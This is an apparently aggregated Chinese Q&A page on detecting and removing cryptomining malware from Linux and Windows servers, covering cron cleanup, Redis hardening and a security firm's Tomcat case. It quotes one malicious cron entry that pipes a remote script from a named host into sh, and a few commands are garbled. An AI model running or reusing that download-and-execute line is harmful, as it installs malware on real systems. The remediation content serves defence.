服务器挖矿排查

1. 如何把右下角挖矿测试去除

一种是使用云安全中心自动清理，另一种是手动清除。登录到云安全中心控制台左侧栏，选择威胁检测，安全告警处理在安全告警处理列表中，找到挖矿程序，然后点处理云安全中心安全告警处理然后根据提示一步步操作即可。

去除的方法

手动清除挖矿程序护云盾以Linux服务器为例，按照以下步骤排查及处理查看挖矿进程的执行PID，命令表示该进程的PID。清除挖矿进程的执行文件，在高CPU消耗的进程中定位到挖矿进程，并杀死该进程。

检查云服务器的防火墙中是否存在挖矿程序的矿池地址，可疑通信地址和开放端口，命令iptablesLn执行以下命令清除恶意矿池地址vietcsysconfigiptables排查是否存在定时任务crontabl根据排查的结果，对可疑的定时任务文件进行清理，防止二次入侵。

2. 服务器被rshim挖矿病毒攻击后 HugePages_Total 透明大页怎么都清不掉 一直占用内存 球球

问题定位及解决步骤：

1、free -m 查看内存使用状态 ，发现free基本没了。--> 怀疑是服务有内存泄漏，开始排查

2、使用top命令观察，开启的服务占用内存量并不大，且最终文档在一个值，且服务为java应用，内存并没达到父jvm设置上限。按top监控占用内存排序，加起来也不会超过物理内存总量。查看硬盘使用量，占用20%。基本排除虚拟内存占用过大的原因。--->排除服务内存泄漏因素，怀疑mysql和nginx，开始排查

3、因为top命令看 mysql占用内存也再可控范围，是否存在connection占用过多内存，发现并不会，设置最大连接数为1000，最多也不会超过几M。 nginx占用一直非常小。但每次最先被kill的基本都是nginx进程。所以排查，但发现无非就是openfiles数量啥的调整。发现也一切正常。且之前niginx可以正常使用的。

4、最为费解的就是 通过free -m 查看的时候 基本全是used，cache部分很少，free基本没有。但top上又找不到有哪些进程占用了内存。无解

5、注意到有两个进程虽占用内存不多，但基本耗光了100%的cpu。开始想着占cpu就占了，没占内存，现在是内存不不够导致进程被kill的，就没注意这点。

6、实在搞不定，重启服务器，重启了所有服务，服务暂时可用，回家。在路上的时候发现又崩了。忐忑的睡觉。

7、早上起来继续看，这次留意注意了下那两个占用高cpu的进程，kdevtmpfsi 和 networkservice。本着看看是啥进程的心态，网络了下。真相一目了然，两个挖矿病毒。

突然后知后觉的意识到错误原因：

1、cpu占用率高，正常服务使用cpu频率较高的服务最容易最内存超标。（因为在需要使用cpu时没cpu资源，内存大量占用，服务瞬间崩溃），然后看top发现刚刚已经占用内存的进程已经被kill了，所以没发现内存有高占用的情况。
2、后面的应用继续使用cpu时也会发生类似情况，倒是服务一个一个逐渐被kill。

问题点基本定位好了，解决问题就相对简单很多：
通过网络，google，常见的病毒清除步骤基本都能解决。这两个挖矿病毒很常见，大致记录下要点。可能所有病毒都会有这些基础操作。

① 首先，查看当前系统中的定时任务：crontab -l
我服务器上有四个定时下载任务 通过wget 和 curl 下载病毒文件，把异常的删掉。要不然删了病毒文件还是会下载下来
crontab -r，全部删除命令（或根据需求删除定时任务）

② 查找病毒文件 可以全部模糊搜索 清除， 但病毒文件基本都用了chattr +i命令 使用chattr -i filename 后再使用rm -f filename 。可删除

③ kill 病毒进程，但注意kill了可能马上就重启了。因为有守护进程，需要把病毒进程的守护进程也kill掉

④ 检查是否root用户被攻击，可能系统配置信息被更改。

⑤ 最好能理解病毒脚本，通过看代码看它做了些什么。针对脚本取修复系统。

3. 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

4. 阿里云windows服务器中了挖矿的病毒怎么清理

光删除没用的，因为没有解决好漏洞。
建议是重做系统，然后找护卫神给你做一下系统安全加固，把漏洞彻底堵住才有效果。

5. 无线网络挖矿会被查到吗

无线网络挖矿会被查到的
可以查到，如果无线路由器或AP有记录的话.
服务器，当用户访问网页时，浏览器就会被感染，将他们的计算机变成矿工。
利用公共无线网络将挖矿脚本注入到任何连接到该接入点的用户的浏览会话中。

6. 怎样知道电脑被挖矿

电脑异常运行缓慢，经常异常死机/卡机，什么都没打开但是cpu占用率非常高，网络缓慢，出现大量网络请求。就需要去检查一下是否中了挖，毕竟现在很流行的。

首先需要先查看计算机的耗电情况，我一般选择安装鲁大师。这个比较方便的掌握电脑的硬件情况，看看cpu和系统的温度很方便的。

然后再检查启动后的系统资源使用情况，有没有异常和较高的内存和cpu的占用情况。Crtl + Alt + Del 即可进入“Windows任务管理器”，“应用程序”---“进程”---“性能”，都是查看系统资源占用状况的。或者：用鼠标点击“开始”，在“运行”里输入：msconfig，也可以进入同样的窗口。

最后在进程里看有没有不熟悉的进程，发现了到网上搜索一下，基本就可以确定有没有了。

检测电脑是否被挖矿方法
挖矿主要利用的是高级显卡，这样效率最高，所以我们只需要监看GPU以及CPU的使用率即可发现。回到主界面，鼠标右键单击开始按钮，如下图所示

2在开始右键菜单点击任务管理器，如下图所示

3进入任务管理器，先看看运行程序有无cpu使用率极高的，如下图所示

4在任务管理器点击性能选项卡，如下图所示

5进入性能选项卡，点击下面的GPU，一般有2个，分别是集成显卡和独立显卡，如下图所示

6正常情况，集成显卡利用率很低，图形游戏或大型绘图软件才会调用独立显卡，如下图所示

7接着我们看独立显卡，默认情况下，独立显卡是不使用的，如果你发现游戏，工程软件没开，独立显卡利用率比较高，那就是被挖矿的，电脑正常，独立显卡是休息状态，

7. 挖矿病毒怎么排查

登录系统查看任务管理器，查看占用内存较大且无法关闭的进程。进程上点击鼠标右键，打开文件位置（先要在文件夹选项中选择显示隐藏文件及操作系文件）。此时你可能会看到有一个Systmss.exe进程和模仿操作系统的svchost.exe进程这里还可以看到一个2.bat文件，右键编辑打开这个文件查看，可查看到恶意进程与哪个挖矿组织通信。

通过查看系统操作日志可分析出病毒的来源、启动时间等信息，一般原因可能是未关闭3389端口且使用了弱密码导致黑客远程登录上次病毒。

根除病毒：将病毒可执行文件Systmss.exe重命名为Systmss.exe1使病毒无法执行，此时可从任务管理器停止进程。打开注册表编辑器删除HKEY_LOCAL_整个目录。

如果是Linux系统请参考：网页链接

8. 网警怎么查单位电脑挖矿

每部电脑挨个排查。
挖矿软件会占用电脑的大量运算资源和电力资源，而且会引起主管部门的关注。局域网内有电脑被安装了挖矿软件是一件让人很头疼的事情，对成百上千台电脑一台一台的进行排查简直就和大海捞针一样，需要耗费大量的时间和人力。因为局域网出口做了NAT网络地址转换，上级部门只能检测到公司的公网IP，所以只能靠公司内部的网管人员来排查具体的终端了。最笨的办法就是一台电脑一台电脑的检查，通过检查程序列表和任务管理器来找挖矿程序。
电脑挖矿通常是指比特币挖矿机，就是用于赚取比特币的电脑。这类电脑一般有专业的挖矿芯片，多采用烧显卡的方式工作，耗电量较大。用户用个人计算机下载软件然后运行特定算法，与远方服务器通讯后可得到相应比特币，是获取比特币的方式之一。

9. 江苏率先全面排查虚拟货币挖矿全省用时26天全部排查完毕，是怎么做到的

社会经济发展越来越快，人们赚钱的手段也是越来越多，很多人通过投资虚拟货币赚得盆满钵满，但是很多炒币的人也是从高楼上面一跃而下，结束了自己的生命，由此可以看出虚拟货币是存在着巨大的风险的，这一次江苏率先全面排查虚拟货币挖矿，全省用时26天全部排查完毕，也是非常的大快人心的，从相关的报道中我们可以看出，这一次主要的调查方式是从IP地址来进行调查的，而且以省内虚拟货币挖矿活动较多的以太坊和比特币为例，挖矿较多的城市有苏州，徐州，南京，当地警方也是立即介入了调查。

3、下一步我国将展开怎样的调查

从相关报道中我们可以看出，下一步江苏省通信管理局将持续开展虚拟货币挖矿态势分析，一定会严厉打击挖矿形式的，希望每一名动了歪心思的人都能够引以为戒。

10. 求助服务器被挖矿程序入侵，如何排查

新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。